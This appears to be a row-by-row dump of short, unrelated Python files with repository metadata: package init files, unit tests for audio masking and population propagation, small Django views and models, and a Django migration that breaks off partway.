return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/natevents/{nat_events_uid}")
| 41.969697 | 118 | 0.735379 | 392 | 2,770 | 4.877551 | 0.132653 | 0.056485 | 0.084728 | 0.207113 | 0.762552 | 0.642782 | 0.623431 | 0.623431 | 0.623431 | 0.623431 | 0 | 0 | 0.131047 | 2,770 | 65 | 119 | 42.615385 | 0.79435 | 0.040433 | 0 | 0 | 0 | 0 | 0.355338 | 0.355338 | 0 | 0 | 0 | 0.015385 | 0 | 1 | 0.45 | false | 0 | 0.05 | 0.45 | 0.975 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
0f9c39f1bddc9494f522a489f297ea357d75b02c | 128 | py | Python | mirtorch/__init__.py | guanhuaw/MIRTorch | 535690946d1f105c6d3532c9fbc68cd78307e945 | [
"BSD-3-Clause"
] | 38 | 2021-03-07T21:51:51.000Z | 2022-03-29T09:32:52.000Z | mirtorch/__init__.py | guanhuaw/MIRTorch | 535690946d1f105c6d3532c9fbc68cd78307e945 | [
"BSD-3-Clause"
] | 2 | 2021-09-17T19:52:50.000Z | 2022-03-29T09:32:42.000Z | mirtorch/__init__.py | guanhuaw/MIRTorch | 535690946d1f105c6d3532c9fbc68cd78307e945 | [
"BSD-3-Clause"
] | null | null | null | from mirtorch import prox
from mirtorch import linear
from mirtorch import nn
__all__ = ['linear', 'prox', 'alg', 'nn', 'dic']
| 21.333333 | 48 | 0.710938 | 18 | 128 | 4.833333 | 0.5 | 0.413793 | 0.62069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15625 | 128 | 5 | 49 | 25.6 | 0.805556 | 0 | 0 | 0 | 0 | 0 | 0.140625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e8556b026e8027d295b775f9d851a8a54cfd4cec | 46 | py | Python | packages/compile-vyper/test/sources/VyperContract3.vyper.py | wbt/truffle | 94e5ce757ef61302288088fbde83e1889385413c | [
"MIT"
] | 24 | 2020-06-19T07:41:25.000Z | 2022-02-15T08:51:10.000Z | packages/compile-vyper/test/sources/VyperContract3.vyper.py | wbt/truffle | 94e5ce757ef61302288088fbde83e1889385413c | [
"MIT"
] | 11 | 2019-04-26T04:05:42.000Z | 2019-08-23T17:27:10.000Z | packages/compile-vyper/test/sources/VyperContract3.vyper.py | wbt/truffle | 94e5ce757ef61302288088fbde83e1889385413c | [
"MIT"
] | 8 | 2020-06-16T11:32:51.000Z | 2022-02-11T09:10:45.000Z | @public
@payable
def vyper_action():
pass
| 9.2 | 19 | 0.695652 | 6 | 46 | 5.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.195652 | 46 | 4 | 20 | 11.5 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0.25 | 0 | 0 | 0.25 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
e89f97b35437e7dd8581422c9fcc71f80a91716f | 31 | py | Python | cosmosdb_sdk/__init__.py | jxjia/cosmos_sdk | be74647f65bed29641c119f842c56510eacbb82a | [
"MIT"
] | null | null | null | cosmosdb_sdk/__init__.py | jxjia/cosmos_sdk | be74647f65bed29641c119f842c56510eacbb82a | [
"MIT"
] | null | null | null | cosmosdb_sdk/__init__.py | jxjia/cosmos_sdk | be74647f65bed29641c119f842c56510eacbb82a | [
"MIT"
] | null | null | null | from .cosmosdb import CosmosDB
| 15.5 | 30 | 0.83871 | 4 | 31 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e8ad77148ce51329d1bd38a91fe48c206e378393 | 106 | py | Python | Code/quote_user.py | UPstartDeveloper/CS-1.2-Intro-Data-Structures | d36ee5ff4496315f07deb748c06afb043bd97c41 | [
"MIT"
] | 1 | 2020-06-05T19:08:45.000Z | 2020-06-05T19:08:45.000Z | Code/quote_user.py | UPstartDeveloper/CS-1.2-Intro-Data-Structures | d36ee5ff4496315f07deb748c06afb043bd97c41 | [
"MIT"
] | 7 | 2019-11-07T03:13:52.000Z | 2019-12-16T16:49:00.000Z | Code/quote_user.py | UPstartDeveloper/adam-smith-tweet-generator | d36ee5ff4496315f07deb748c06afb043bd97c41 | [
"MIT"
] | null | null | null | from python_quote import random_python_quote
if __name__ == "__main__":
print(random_python_quote())
| 21.2 | 44 | 0.783019 | 14 | 106 | 5 | 0.642857 | 0.471429 | 0.485714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132075 | 106 | 4 | 45 | 26.5 | 0.76087 | 0 | 0 | 0 | 0 | 0 | 0.075472 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.333333 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
e8b67eeb1e2a34a29fedf28d5f6887297faa596f | 2,620 | py | Python | tests/test_time_mask.py | jeongyoonlee/audiomentations | 7f0112ae310989430e0ef7eb32c4116114810966 | [
"MIT"
] | 930 | 2019-02-14T10:21:22.000Z | 2022-03-31T03:49:48.000Z | tests/test_time_mask.py | jeongyoonlee/audiomentations | 7f0112ae310989430e0ef7eb32c4116114810966 | [
"MIT"
] | 169 | 2019-02-12T21:16:14.000Z | 2022-03-18T07:53:43.000Z | tests/test_time_mask.py | jeongyoonlee/audiomentations | 7f0112ae310989430e0ef7eb32c4116114810966 | [
"MIT"
] | 122 | 2019-02-26T05:12:45.000Z | 2022-03-24T08:45:51.000Z | import unittest
import numpy as np
from audiomentations.augmentations.transforms import TimeMask
from audiomentations.core.composition import Compose
class TestTimeMask(unittest.TestCase):
def test_apply_time_mask(self):
sample_len = 1024
samples_in = np.random.normal(0, 1, size=sample_len).astype(np.float32)
sample_rate = 16000
augmenter = Compose([TimeMask(min_band_part=0.2, max_band_part=0.5, p=1.0)])
samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)
self.assertEqual(samples_out.dtype, np.float32)
self.assertEqual(len(samples_out), sample_len)
std_in = np.mean(np.abs(samples_in))
std_out = np.mean(np.abs(samples_out))
self.assertLess(std_out, std_in)
def test_apply_time_mask_multichannel(self):
sample_len = 1024
samples_in = np.random.normal(0, 1, size=(2, sample_len)).astype(np.float32)
sample_rate = 16000
augmenter = TimeMask(min_band_part=0.2, max_band_part=0.5, p=1.0)
samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)
self.assertEqual(samples_out.dtype, np.float32)
self.assertEqual(samples_out.shape, samples_in.shape)
std_in = np.mean(np.abs(samples_in))
std_out = np.mean(np.abs(samples_out))
self.assertLess(std_out, std_in)
def test_apply_time_mask_with_fade(self):
sample_len = 1024
samples_in = np.random.normal(0, 1, size=sample_len).astype(np.float32)
sample_rate = 16000
augmenter = Compose(
[TimeMask(min_band_part=0.2, max_band_part=0.5, fade=True, p=1.0)]
)
samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)
self.assertEqual(samples_out.dtype, np.float32)
self.assertEqual(len(samples_out), sample_len)
std_in = np.mean(np.abs(samples_in))
std_out = np.mean(np.abs(samples_out))
self.assertLess(std_out, std_in)
def test_apply_time_mask_with_fade_short_signal(self):
sample_len = 100
samples_in = np.random.normal(0, 1, size=sample_len).astype(np.float32)
sample_rate = 16000
augmenter = Compose(
[TimeMask(min_band_part=0.2, max_band_part=0.5, fade=True, p=1.0)]
)
samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)
self.assertEqual(samples_out.dtype, np.float32)
self.assertEqual(len(samples_out), sample_len)
std_in = np.mean(np.abs(samples_in))
std_out = np.mean(np.abs(samples_out))
self.assertLess(std_out, std_in)
| 37.971014 | 84 | 0.682061 | 382 | 2,620 | 4.408377 | 0.15445 | 0.095012 | 0.042755 | 0.052257 | 0.861045 | 0.849169 | 0.849169 | 0.849169 | 0.849169 | 0.820665 | 0 | 0.04058 | 0.209924 | 2,620 | 68 | 85 | 38.529412 | 0.772947 | 0 | 0 | 0.698113 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.226415 | 1 | 0.075472 | false | 0 | 0.075472 | 0 | 0.169811 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e8c643284e5eb0048db5e44deafdd8c3f6ec0e42 | 184 | py | Python | vendor/packages/pylint/test/input/func_w0704.py | jgmize/kitsune | 8f23727a9c7fcdd05afc86886f0134fb08d9a2f0 | [
"BSD-3-Clause"
] | 2 | 2019-08-19T17:08:47.000Z | 2019-10-05T11:37:02.000Z | vendor/packages/pylint/test/input/func_w0704.py | jgmize/kitsune | 8f23727a9c7fcdd05afc86886f0134fb08d9a2f0 | [
"BSD-3-Clause"
] | null | null | null | vendor/packages/pylint/test/input/func_w0704.py | jgmize/kitsune | 8f23727a9c7fcdd05afc86886f0134fb08d9a2f0 | [
"BSD-3-Clause"
] | null | null | null | """test empty except
"""
__revision__ = 1
try:
__revision__ += 1
except TypeError:
pass
try:
__revision__ += 1
except TypeError:
pass
else:
__revision__ = None
| 10.823529 | 24 | 0.641304 | 20 | 184 | 5.1 | 0.5 | 0.264706 | 0.235294 | 0.352941 | 0.607843 | 0.607843 | 0 | 0 | 0 | 0 | 0 | 0.022222 | 0.266304 | 184 | 16 | 25 | 11.5 | 0.733333 | 0.092391 | 0 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.181818 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
2cde165a01180fdf8a58607038b0867e0a8f76b5 | 187 | py | Python | pyclopedia/p02_ref/p03_objective_oriented/p04_magic_method/__init__.py | MacHu-GWU/pyclopedia-project | c6ee156eb40bc5a4ac5f51aa735b6fd004cb68ee | [
"MIT"
] | null | null | null | pyclopedia/p02_ref/p03_objective_oriented/p04_magic_method/__init__.py | MacHu-GWU/pyclopedia-project | c6ee156eb40bc5a4ac5f51aa735b6fd004cb68ee | [
"MIT"
] | null | null | null | pyclopedia/p02_ref/p03_objective_oriented/p04_magic_method/__init__.py | MacHu-GWU/pyclopedia-project | c6ee156eb40bc5a4ac5f51aa735b6fd004cb68ee | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Python2 Doc: https://docs.python.org/2/reference/datamodel.html
Python3.3 Doc: https://docs.python.org/3.3/reference/datamodel.html
"""
| 23.375 | 67 | 0.68984 | 29 | 187 | 4.448276 | 0.62069 | 0.124031 | 0.186047 | 0.27907 | 0.325581 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040936 | 0.085562 | 187 | 7 | 68 | 26.714286 | 0.71345 | 0.930481 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fa173302ebc414485b9a480ac26c512ed16b1bb6 | 98 | py | Python | tensortrade/features/stationarity/__init__.py | Kukunin/tensortrade | c5b5c40232a334d9b38359eab0c0ce0e4c9e43ed | [
"Apache-2.0"
] | 7 | 2020-09-28T23:36:40.000Z | 2022-02-22T02:00:32.000Z | tensortrade/features/stationarity/__init__.py | Kukunin/tensortrade | c5b5c40232a334d9b38359eab0c0ce0e4c9e43ed | [
"Apache-2.0"
] | 4 | 2020-11-13T18:48:52.000Z | 2022-02-10T01:29:47.000Z | tensortrade/features/stationarity/__init__.py | Kukunin/tensortrade | c5b5c40232a334d9b38359eab0c0ce0e4c9e43ed | [
"Apache-2.0"
] | 3 | 2020-11-23T17:31:59.000Z | 2021-04-08T10:55:03.000Z | from .log_difference import LogDifference
from .fractional_difference import FractionalDifference
| 32.666667 | 55 | 0.897959 | 10 | 98 | 8.6 | 0.7 | 0.372093 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081633 | 98 | 2 | 56 | 49 | 0.955556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fa33f54f0859d7a3c7f734437589b77eefe5d3b4 | 135 | py | Python | kaptos/config.py | VA7EXE/kaptos | 88de0969796b0467970dd553158e7b9fc5698070 | [
"MIT"
] | 1 | 2019-11-29T22:53:44.000Z | 2019-11-29T22:53:44.000Z | kaptos/config.py | VA7EXE/kaptos | 88de0969796b0467970dd553158e7b9fc5698070 | [
"MIT"
] | 2 | 2020-03-07T21:49:29.000Z | 2021-03-10T10:39:20.000Z | kaptos/config.py | VA7EXE/kaptos | 88de0969796b0467970dd553158e7b9fc5698070 | [
"MIT"
] | 2 | 2019-01-27T10:53:26.000Z | 2019-11-29T22:27:01.000Z | """Kaptos configuration module."""
import appdirs
import toml
config = toml.load(f"{appdirs.user_config_dir('kaptos')}/config.toml")
| 19.285714 | 70 | 0.748148 | 18 | 135 | 5.5 | 0.611111 | 0.20202 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 135 | 6 | 71 | 22.5 | 0.804878 | 0.207407 | 0 | 0 | 0 | 0 | 0.465347 | 0.465347 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fa4ccf64bbdebfd6cf3110ff89c3f92ea08a841e | 2,247 | py | Python | tests/unit/qm/propagators/poppropagator_test.py | slamavl/quantarhei | d822bc2db86152c418e330a9152e7866869776f7 | [
"MIT"
] | 14 | 2016-10-16T13:26:05.000Z | 2021-11-09T11:40:52.000Z | tests/unit/qm/propagators/poppropagator_test.py | slamavl/quantarhei | d822bc2db86152c418e330a9152e7866869776f7 | [
"MIT"
] | 61 | 2016-09-19T10:45:56.000Z | 2021-11-10T13:53:06.000Z | tests/unit/qm/propagators/poppropagator_test.py | slamavl/quantarhei | d822bc2db86152c418e330a9152e7866869776f7 | [
"MIT"
] | 21 | 2016-08-30T09:09:28.000Z | 2022-03-30T03:16:35.000Z | # -*- coding: utf-8 -*-
import unittest
import numpy
"""
*******************************************************************************
Tests of the quantarhei.qm.propagators.poppropagator module
*******************************************************************************
"""
from quantarhei import PopulationPropagator
from quantarhei import TimeAxis
class TestPopulationPropagator(unittest.TestCase):
    """Tests population propagator module
    """

    def test_of_population_evolution_1(self):
        """Testing population evolution matrix 2x2 starting from t = 0"""
        KK = numpy.array([[-1.0/100.0, 1.0/100.0],
                          [ 1.0/100.0, -1.0/100.0]])
        U0 = numpy.eye(2)
        Ntd = 10
        t = TimeAxis(0.0, 1000, 1.0)
        prop = PopulationPropagator(t, rate_matrix=KK)
        td = TimeAxis(0.0, Ntd, 10.0)
        U = prop.get_PropagationMatrix(td)
        # analytical result
        Ucheck = numpy.zeros((2,2,Ntd))
        Ucheck[0,0,:] = 0.5*(1.0+numpy.exp(2.0*KK[0,0]*td.data))
        Ucheck[1,1,:] = Ucheck[0,0,:]
        Ucheck[1,0,:] = 0.5*(1.0-numpy.exp(2.0*KK[0,0]*td.data))
        Ucheck[0,1,:] = Ucheck[1,0,:]
        for n in range(Ntd):
            numpy.testing.assert_allclose(U[:,:,n], Ucheck[:,:,n])

    def test_of_population_evolution_2(self):
        """Testing population evolution matrix 2x2 starting from t > 0"""
        KK = numpy.array([[-1.0/100.0, 1.0/100.0],
                          [ 1.0/100.0, -1.0/100.0]])
        U0 = numpy.eye(2)
        Ntd = 10
        t = TimeAxis(0.0, 1000, 1.0)
        prop = PopulationPropagator(t, rate_matrix=KK)
        td = TimeAxis(2.0, Ntd, 10.0)
        U = prop.get_PropagationMatrix(td)
        # analytical result
        Ucheck = numpy.zeros((2,2,Ntd))
        Ucheck[0,0,:] = 0.5*(1.0+numpy.exp(2.0*KK[0,0]*td.data))
        Ucheck[1,1,:] = Ucheck[0,0,:]
        Ucheck[1,0,:] = 0.5*(1.0-numpy.exp(2.0*KK[0,0]*td.data))
        Ucheck[0,1,:] = Ucheck[1,0,:]
        for n in range(Ntd):
            numpy.testing.assert_allclose(U[:,:,n], Ucheck[:,:,n])
| 27.072289 | 79 | 0.478416 | 293 | 2,247 | 3.62116 | 0.208191 | 0.03393 | 0.0377 | 0.04524 | 0.778511 | 0.72573 | 0.72573 | 0.72573 | 0.72573 | 0.72573 | 0 | 0.095509 | 0.296395 | 2,247 | 82 | 80 | 27.402439 | 0.575585 | 0.101469 | 0 | 0.756757 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054054 | 1 | 0.054054 | false | 0 | 0.108108 | 0 | 0.189189 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fa679d2ad36473d072be4237fbf6535b28a6f9e8 | 165 | py | Python | docs/cookbook/defaults/test.py | BlameJohnny/redo | b08b5efcef8ab9cf9d532fdd50994e1092144924 | [
"Apache-2.0"
] | 1,002 | 2015-01-03T04:53:27.000Z | 2022-03-30T11:25:06.000Z | docs/cookbook/defaults/test.py | BlameJohnny/redo | b08b5efcef8ab9cf9d532fdd50994e1092144924 | [
"Apache-2.0"
] | 24 | 2015-08-27T20:32:56.000Z | 2021-11-30T16:59:59.000Z | docs/cookbook/defaults/test.py | BlameJohnny/redo | b08b5efcef8ab9cf9d532fdd50994e1092144924 | [
"Apache-2.0"
] | 84 | 2015-01-05T14:43:51.000Z | 2022-02-11T13:19:28.000Z | #!/usr/bin/env python
"""Test program for auto-generated version.py"""
import version
print('Version %r has build date %r'
% (version.VERSION, version.DATE))
| 23.571429 | 48 | 0.69697 | 24 | 165 | 4.791667 | 0.708333 | 0.243478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151515 | 165 | 6 | 49 | 27.5 | 0.821429 | 0.381818 | 0 | 0 | 1 | 0 | 0.291667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.333333 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
d75b0646fb60d0d48af2feeab63ce12f68da8787 | 114 | py | Python | webomics/pipelines/views.py | silva1jos/webomics-tbd | f719fe0c51086fd6c67aa53d04fdea269f049d9a | [
"MIT"
] | null | null | null | webomics/pipelines/views.py | silva1jos/webomics-tbd | f719fe0c51086fd6c67aa53d04fdea269f049d9a | [
"MIT"
] | null | null | null | webomics/pipelines/views.py | silva1jos/webomics-tbd | f719fe0c51086fd6c67aa53d04fdea269f049d9a | [
"MIT"
] | null | null | null | from django.shortcuts import render
def index_view(request):
    return render(request, 'pipelines/index.html')
| 19 | 50 | 0.77193 | 15 | 114 | 5.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131579 | 114 | 5 | 51 | 22.8 | 0.878788 | 0 | 0 | 0 | 0 | 0 | 0.175439 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
d7930c6605e170b51f9c5e57950d9b9d4962245f | 76 | py | Python | phosphoproteomics/models.py | naderm/django_rest_omics | c6314f96f157d95cd95e03a5fdea4a1176d6d05a | [
"BSD-2-Clause"
] | null | null | null | phosphoproteomics/models.py | naderm/django_rest_omics | c6314f96f157d95cd95e03a5fdea4a1176d6d05a | [
"BSD-2-Clause"
] | null | null | null | phosphoproteomics/models.py | naderm/django_rest_omics | c6314f96f157d95cd95e03a5fdea4a1176d6d05a | [
"BSD-2-Clause"
] | null | null | null |
from django.db import models
class Phosphopeptide(models.Model):
    pass
| 12.666667 | 35 | 0.763158 | 10 | 76 | 5.8 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171053 | 76 | 5 | 36 | 15.2 | 0.920635 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
ad02341f4ca99c17a7537966a6caf9f324b5f023 | 10,143 | py | Python | project/apps/keller/migrations/0001_initial.py | bhs-contests/barberscore-api | 7bd06b074c99903f031220f41b15a22474724044 | [
"BSD-2-Clause"
] | null | null | null | project/apps/keller/migrations/0001_initial.py | bhs-contests/barberscore-api | 7bd06b074c99903f031220f41b15a22474724044 | [
"BSD-2-Clause"
] | 9 | 2020-06-05T22:17:17.000Z | 2022-03-12T00:04:00.000Z | project/apps/keller/migrations/0001_initial.py | bhs-contests/barberscore-api | 7bd06b074c99903f031220f41b15a22474724044 | [
"BSD-2-Clause"
] | null | null | null | # Generated by Django 2.1.9 on 2019-06-24 22:49
import django.contrib.postgres.fields
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):

    initial = True

    dependencies = [
        ('rmanager', '0001_initial'),
        ('bhs', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='CleanFlat',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('points', models.IntegerField()),
            ],
        ),
        migrations.CreateModel(
            name='CleanPanelist',
            fields=[
                ('id', models.IntegerField(editable=False, primary_key=True, serialize=False)),
                ('year', models.IntegerField()),
                ('season', models.IntegerField(choices=[(1, 'Summer'), (2, 'Midwinter'), (3, 'Fall'), (4, 'Spring')])),
                ('district', models.CharField(max_length=255)),
                ('convention', models.CharField(max_length=255)),
                ('session', models.IntegerField(choices=[(32, 'Chorus'), (41, 'Quartet'), (42, 'Mixed'), (43, 'Senior'), (44, 'Youth'), (45, 'Unknown'), (46, 'VLQ')])),
                ('round', models.IntegerField(choices=[(1, 'Finals'), (2, 'Semi-Finals'), (3, 'Quarter-Finals')])),
                ('category', models.IntegerField(choices=[(30, 'Music'), (40, 'Performance'), (50, 'Singing')])),
                ('num', models.IntegerField()),
                ('legacy_person', models.CharField(max_length=255)),
                ('scores', django.contrib.postgres.fields.jsonb.JSONField()),
                ('panelist', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='rmanager.Panelist')),
            ],
        ),
        migrations.CreateModel(
            name='CleanSong',
            fields=[
                ('id', models.IntegerField(editable=False, primary_key=True, serialize=False)),
                ('year', models.IntegerField()),
                ('season', models.IntegerField(choices=[(1, 'Summer'), (2, 'Midwinter'), (3, 'Fall'), (4, 'Spring')])),
                ('district', models.CharField(max_length=255)),
                ('convention', models.CharField(max_length=255)),
                ('session', models.IntegerField(choices=[(32, 'Chorus'), (41, 'Quartet'), (42, 'Mixed'), (43, 'Senior'), (44, 'Youth'), (45, 'Unknown'), (46, 'VLQ')])),
                ('round', models.IntegerField(choices=[(1, 'Finals'), (2, 'Semi-Finals'), (3, 'Quarter-Finals')])),
                ('appearance_num', models.IntegerField()),
                ('song_num', models.IntegerField()),
                ('legacy_group', models.CharField(max_length=255)),
                ('legacy_chart', models.CharField(max_length=255)),
                ('scores', django.contrib.postgres.fields.jsonb.JSONField()),
                ('appearance', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='rmanager.Appearance')),
                ('song', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='rmanager.Song')),
            ],
        ),
        migrations.CreateModel(
            name='Complete',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('row_id', models.IntegerField(blank=True, null=True)),
                ('year', models.IntegerField(blank=True, null=True)),
                ('season_kind', models.IntegerField(blank=True, choices=[(1, 'Summer'), (2, 'Midwinter'), (3, 'Fall'), (4, 'Spring')], null=True)),
                ('district_code', models.CharField(blank=True, max_length=255)),
                ('convention_name', models.CharField(blank=True, max_length=255)),
                ('session_kind', models.IntegerField(blank=True, choices=[(32, 'Chorus'), (41, 'Quartet'), (42, 'Mixed'), (43, 'Senior'), (44, 'Youth'), (45, 'Unknown'), (46, 'VLQ')], null=True)),
                ('round_kind', models.IntegerField(blank=True, choices=[(1, 'Finals'), (2, 'Semi-Finals'), (3, 'Quarter-Finals')], null=True)),
                ('category_kind', models.IntegerField(blank=True, choices=[(30, 'Music'), (40, 'Performance'), (50, 'Singing')], null=True)),
                ('points', django.contrib.postgres.fields.ArrayField(base_field=models.IntegerField(blank=True, null=True), blank=True, null=True, size=None)),
                ('panelist', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='rmanager.Panelist')),
                ('person', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='completes', to='bhs.Person')),
            ],
        ),
        migrations.CreateModel(
            name='Flat',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('complete', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='flats', to='keller.Complete')),
                ('score', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='rmanager.Score')),
            ],
        ),
        migrations.CreateModel(
            name='RawPanelist',
            fields=[
                ('id', models.IntegerField(editable=False, primary_key=True, serialize=False)),
                ('year', models.IntegerField()),
                ('season', models.CharField(max_length=255)),
                ('district', models.CharField(max_length=255)),
                ('convention', models.CharField(max_length=255)),
                ('session', models.CharField(max_length=255)),
                ('round', models.CharField(max_length=255)),
                ('category', models.CharField(max_length=255)),
